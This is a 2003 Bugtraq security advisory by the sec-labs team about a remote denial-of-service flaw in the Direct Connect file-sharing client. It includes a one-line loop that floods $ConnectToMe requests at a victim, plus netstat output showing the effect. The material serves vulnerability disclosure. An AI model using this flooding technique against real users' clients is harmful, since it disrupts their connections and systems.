[30722] in bugtraq
[sec-labs] Remote Denial of Service vulnerability in NeoModus
daemon@ATHENA.MIT.EDU (sec-labs team)
Mon Jul 14 14:12:46 2003
Date: Mon, 14 Jul 2003 13:35:12 +0000
From: sec-labs team <noreply@sec-labs.hack.pl>
To: bugtraq@securityfocus.com
Message-Id: <20030714133512.27a473bf.noreply@sec-labs.hack.pl>
Mime-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature";
micalg="pgp-sha1"; boundary="=.J:gysAG)N(3_zv"
--=.J:gysAG)N(3_zv
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
sec-labs team proudly presents:
Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
and probably newest version.
by Lord YuP
13/07/2003
I. BACKGROUND
Direct Connect is a windows (i've found also a linux version but
i don't have time to test it) p2p file-sharing program, well
common nowadays.
II. DESCRIPTION
Appending to aDe DC Client to Client HandShake looks like:
Client <-> Client Communication in DC. 11-05-2002. By aDe
----------------------------------------------------------
ACTIVE FILE DOWNLOAD
----------------------
D = downloader
U = uploader
H = hub
D>H: $ConnectToMe <U's username> <D's IP and port>|
H>U: $ConnectToMe <U's username> <D's IP and port>|
...bla bla ... ;)
As u can guess, the Direct Connect client after receiving
"$Connect ToMe..." command from hub, tries to connect to
specyfic IP and PORT sent by the Downloader.
The attacker (evil-downloader) can send infinite requests
to HUB with specyfic marked ip:port causing DoS attack
in the Victim's client.
Little example:
Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }
Client: (runned "netstat -a")
TCP jin:1993 JIN:0 LISTENING
TCP jin:1995 JIN:0 LISTENING
TCP jin:1996 JIN:0 LISTENING
TCP jin:2005 JIN:0 LISTENING
TCP jin:2006 JIN:0 LISTENING
TCP jin:2007 JIN:0 LISTENING
TCP jin:2008 JIN:0 LISTENING
TCP jin:2009 JIN:0 LISTENING
TCP jin:2010 JIN:0 LISTENING
TCP jin:2011 JIN:0 LISTENING
TCP jin:2012 JIN:0 LISTENING
TCP jin:2013 JIN:0 LISTENING
TCP jin:2014 JIN:0 LISTENING
TCP jin:2015 JIN:0 LISTENING
TCP jin:2016 JIN:0 LISTENING
TCP jin:2017 JIN:0 LISTENING
TCP jin:2018 JIN:0 LISTENING
TCP jin:2019 JIN:0 LISTENING
...and so on...
III. IMPACT
The attacked client may be DoS-ed in case of that internet connection
can be reseted/stopped, some clients may flood with the "Out of Memory"
msgboxes in case of that, system may be not working correctly, and DC
client may be terminated.
--
sec-labs team [http://sec-labs.hack.pl]
--=.J:gysAG)N(3_zv
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)
iD8DBQE/ErGbZ4yD+a7QMvgRAtHAAJ4p3VdNdcgaalFZrNd55aUTQV/oWACfcIWP
8SbHBbP2lBeggKIxUnpKoSw=
=Jk4G
-----END PGP SIGNATURE-----
--=.J:gysAG)N(3_zv--
